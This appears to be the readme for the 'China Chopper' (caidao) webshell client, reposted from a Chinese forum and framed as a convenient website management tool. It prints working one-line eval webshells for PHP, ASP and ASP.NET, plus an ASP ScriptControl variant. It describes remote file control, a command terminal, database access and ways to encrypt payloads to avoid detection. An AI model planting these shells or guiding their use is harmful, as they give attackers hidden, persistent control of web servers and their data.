一、网站管理模块
(1)放在网站上的脚本程序分两种
1.1)“一句话(Eval)”:
PHP, ASP, ASP.NET 的网站都可以,支持https。下面的代码放在网站目录即可开始管理,比FTP好用多了是不是:
- 1 PHP: <?php @eval($_POST['caidao']);?>
- 2 ASP: <%eval request("caidao")%>
- 3 ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>
1.2)自己开发的脚本程序(Customize):
理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。
(2)常用功能介绍
2.1)文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.2)虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
2.3)数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。
2.4) 自写脚本(只有Eval端才支持):
通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
可以在官网下载别人的CCC脚本,或分享你的得意之作
(3)配置框填写说明
----------------
(A) 数据库相关:
----------------
PHP:
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U> 连接数据库的用户名,如root
< >数据库密码</P> 连接数据库的密码,如123455
<N>默认库</N> 默认连接的库名
<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1
ASP 和 ASP.NET:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sawd=123456;
Customize:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
- <X>
- com.microsoft.sqlserver.jdbc.SQLServerDriver
- jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
- </X>
- MYSQL:
- <X>
- com.mysql.jdbc.Driver
- jdbc:mysql://localhost/test?user=root&password=123456
- </X>
- ORACLE:
- <X>
- oracle.jdbc.driver.OracleDriver
- jdbc:oracle:thin:user/password@127.0.0.1:1521/test
- </X>
-------------
B) 其它配置:
-------------
添加额外附加提交的数据,如ASP的新服务端是这样的:
- <%
- Set o = Server.CreateObject("ScriptControl")
- o.language = "vbscript"
- o.addcode(Request("SC"))
- o.run "ff",Server,Response,Request,Application,Session,Error
- %>
那么,菜刀在配置处填入:
- <O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("caidao")):end+function</O>
然后以密码caidao来连接即可。
默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>
虚拟终端默认命令设置示例:
<CMD>whoami</CMD>
文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>
如果你网站开通了HTTP登录验证,可以这样填地址:
http://user:pass@maicaidao.com/admin.asp
用户名密码中的特殊字符可用URL编码转换。
【20160620后的版本多了个文件caidao.conf】
这个文件是必须有的,里面的各节点一个也不能删,不然程序运行会出错!
默认调用的是caidao.conf,菜单里有个“加载配置文件”的菜单项,可以切换配置文件。
这个文件必段存为UNICODE编码!
各节点简单介绍一下:
<FLAG> 返回的内容分隔符,只限三个字符,用生辟点的字符吧。
<UA> 自定义User-Agent的值
<K1> POST的第一个参数名称,不再是原版本固定的z1
<K2> 同上
<HP_BASE> 这是PHP脚本的基本代码,其它的功能代码最终会传到这里面,注意里面的%s %d这样的参数
<ASP_BASE> 同上
<ASPX_BASE> 同上
<HP_BASE.加密示例> 这个不会用到,如果临时复制出来一个节点,可以取一个不同的节点名字,不要重名了。
这里示范的是如何把PHP_BASE的内容加密发送。
相信你会做得更好。
- <GETBASEINFO>
- <SHOWFOLDER>
- <SHOWTXTFILE>
- <SAVETXTFILE>
- <DELETEFILE>
- <DOWNFILE>
- <UPLOADFILE>
- <PASTEFILE>
- <NEWFOLDER>
- <WGET>
- <SHELL>
- <RENAME>
- <SETTIME>
-----------上面这些,你懂的,就不费篇幅了
<DB_PHP_MYSQL_DBLIST> PHP脚本刚连接时调用这里,给出库列表
<DB_PHP_MYSQL_TABLELIST> 点击库调用,显示数据表
<DB_PHP_MYSQL_COLUMNLIST> 点击数据表调用,显示数据表字段
<DB_PHP_MYSQL_EXECUTESQL> 执行SQL,分别处理查询和执行并给出结果。
....
接下来的几样都是PHP连其它库的,大同小异。
- <DB_ASP_ADO_DBLIST>
- <DB_ASP_ADO_TABLELIST>
- <DB_ASP_ADO_COLUMNLIST>
- <DB_ASP_ADO_EXECUTESQL>
上面是ASP管理数据库的脚本,用ADO来整的。
- <DB_ASPX_ADO_DBLIST>
- <DB_ASPX_ADO_TABLELIST>
- <DB_ASPX_ADO_COLUMNLIST>
- <DB_ASPX_ADO_EXECUTESQL>
ASPX的,当然还有其它好用的方式,看你的习惯来改了。
二、记事本
忽然觉得有个地方记录点东西还是挺方便的。
三、浏览器
就是一个专用的网页浏览器,
Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。
四、文件说明:
- caidao.exe 菜刀程序
- db.mdb 菜刀的主数据库
- caidao.conf 配置文件(重要,千万别删除)
- cache.tmp 菜刀的缓存数据库(可删除)
- readme.txt 你现在正在看的(可删除)
- ip.dat 一个IP库,用于IP地址识别(可删除)
- <CCC> 菜刀的自写脚本目录(可删除)
- <Customize> Customize模式的服务端(可删除)
- Customize.aspx 这是一个C#的示例服务端(全功能)
- Customize.jsp 这是一个jsp的示例服务端(全功能)
- Customize.cfm 这是一个cfm的示例服务端(文件管理,虚拟终端)
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
